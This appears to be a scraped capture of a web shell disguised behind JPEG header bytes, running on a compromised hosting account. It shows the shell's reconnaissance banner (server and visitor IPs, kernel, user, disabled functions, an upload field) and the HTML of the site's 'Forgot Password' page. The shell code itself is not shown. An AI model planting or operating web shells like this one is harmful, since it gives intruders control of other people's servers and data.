���� JFIF fdasasfas213sdaf
Server IP : 147.93.77.42 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/aluminiumplant.com/public_html/webapp/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <title>Forgot Password</title> <meta content="" name="description"> <meta content="" name="keywords"> <meta name="robots" content="nofollow"> <meta name="googlebot" content="noindex"> <!-- Favicons --> <link href="assets/img/favicon.png" rel="icon"> <!-- Vendor CSS Files --> <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet"> <!-- Template Main CSS File --> <link href="assets/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/responsive.css"> </head> <body> <!-- ----------------------Login--------------- --> <section class="login-page forget_password"> <div class="login_left"> <img src="assets/img/login/login_side_img.svg" alt=""> </div> <div class="right_side"> <div class="gotohome"> <a href="index.html"><i class="bi bi-arrow-left"></i> Back To Previous Page </a> </div> <div class="login_right"> <div class="inner_center"> <h3>Forgot <span>Password?</span></h3> <p>Please Enter Your Mobile Number</p> <form method="get" class="login_form digit-group" data-group-name="digits" data-autosubmit="false" autocomplete="off"> <div class="login_input"> <input type="text" maxlength="10" class="form-control" id="mobile" onkeypress="return event.charCode >= 48 && event.charCode <= 57" onpaste="return false" placeholder="Mobile" required> </div> <div class="login_buttons d-flex align-items-center justify-content-between"> <a type="submit" class="yellow-btn">Send</a> <div class="d-flex login_register_btn"> <a href="login.html">Log In</a> <span>|</span> <a href="register.html">Register</a> </div> </div> </div> </form> </div> </div> </section> <!-- Vendor JS Files --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <!-- Template Main JS File --> </body> </html>